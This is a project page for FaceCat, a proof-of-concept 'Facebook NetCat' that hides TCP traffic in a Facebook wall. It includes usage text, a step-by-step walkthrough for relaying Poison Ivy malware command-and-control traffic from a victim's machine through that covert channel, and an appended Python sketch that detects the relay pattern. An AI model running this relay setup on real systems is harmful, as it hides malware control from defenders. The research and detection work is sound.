Home
FaceCat is a tool developed as a Proof of Concept regarding Covert Channels over Social Networks.
FaceCat is a FaceBook NetCat, and can be used to hide TCP traffic within a FaceBook Wall.
You can DOWNLOAD it or you can watch a couple of demos: TCP Chat, Poison Ivy.
WARNING! FaceCat is a PoC and it isn't updated on a regular basis, so if FaceBook changes it may be necessary to make some fixes in the code. If you update it for your own demos, please send a PULL REQUEST.
You can read more about FaceCat in my SANS GCIH Gold Paper.
$ ./facecat.py
Usage: facecat.py [options]

Options:
  -h, --help            show this help message and exit
  -w WALL, --wall=WALL  wall pipe account
  -c HOST, --host=HOST  connection host
  -p PORT, --port=PORT  listening or connection port
  -v, --verbose         verbose output
1 - Create a Poison Ivy (or any other malware) sample. It should connect to 127.0.0.1:3460 as its C&C.
2 - Run facecat in server mode on the victim's machine. The FaceBook account used as the covert channel is wall1@gmail.com:
facecat.py -v -w wall1@gmail.com -p 3460
3 - Run the Poison Ivy C&C on the attacker's machine, then run facecat in client mode (it connects to the Poison Ivy C&C via TCP and to the server-mode facecat via the covert channel):
facecat.py -v -w wall1@gmail.com -c 127.0.0.1 -p 3460
4 - Run the Poison Ivy sample on the victim's machine. It connects to the server-mode facecat, which relays the communications through the FaceBook covert channel. The client-mode facecat connects to the C&C and completes the relay channel.
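The relay layout in steps 1-4 leaves a recognisable host-side pattern: one process accepts a loopback connection from a different process while itself holding a session to a social-network endpoint. The following detection sketch is an added example, not part of FaceCat; the socket-record format, process names, PIDs, addresses and the domain list are constructed assumptions.

```python
from collections import namedtuple

# Constructed socket-table rows, shaped like a netstat or host-sensor export (assumed format).
Sock = namedtuple("Sock", "pid proc laddr lport raddr rport state rhost")

SAMPLE = [
    Sock(410, "python", "127.0.0.1", 3460, "", 0, "LISTEN", ""),
    Sock(410, "python", "127.0.0.1", 3460, "127.0.0.1", 49812, "ESTABLISHED", ""),
    Sock(932, "sample.exe", "127.0.0.1", 49812, "127.0.0.1", 3460, "ESTABLISHED", ""),
    Sock(410, "python", "10.0.0.5", 50110, "203.0.113.7", 443, "ESTABLISHED", "www.facebook.com"),
    Sock(777, "browser", "10.0.0.5", 50200, "203.0.113.7", 443, "ESTABLISHED", "www.facebook.com"),
    Sock(650, "postgres", "127.0.0.1", 5432, "", 0, "LISTEN", ""),
    Sock(651, "app", "127.0.0.1", 40000, "127.0.0.1", 5432, "ESTABLISHED", ""),
]

# Assumption: suffixes treated as social-network endpoints; tune per environment.
SOCIAL_SUFFIXES = ("facebook.com", "fbcdn.net")

def is_loopback(addr):
    return addr.startswith("127.") or addr == "::1"

def is_social(host):
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in SOCIAL_SUFFIXES)

def find_relays(socks):
    """Flag listeners that serve another local process over loopback
    while the listening process also talks to a social-network host."""
    # The listener's bind address is not checked: only the client side must use loopback.
    listeners = {(s.pid, s.lport): s for s in socks if s.state == "LISTEN"}
    social_pids = {s.pid for s in socks
                   if s.state == "ESTABLISHED" and is_social(s.rhost)}
    findings = []
    for (pid, port), lsn in sorted(listeners.items()):
        if pid not in social_pids:
            continue  # ordinary local service (e.g. a database), no social session
        clients = sorted({(c.pid, c.proc) for c in socks
                          if c.state == "ESTABLISHED" and is_loopback(c.raddr)
                          and c.rport == port and c.pid != pid})
        for cpid, cproc in clients:
            findings.append({"relay_pid": pid, "relay_proc": lsn.proc, "port": port,
                             "client_pid": cpid, "client_proc": cproc})
    return findings

if __name__ == "__main__":
    for finding in find_relays(SAMPLE):
        print(finding)
```

On the constructed sample, only the loopback listener on port 3460 is reported; the browser and the local database are not, since neither combines a local client with a social-network session.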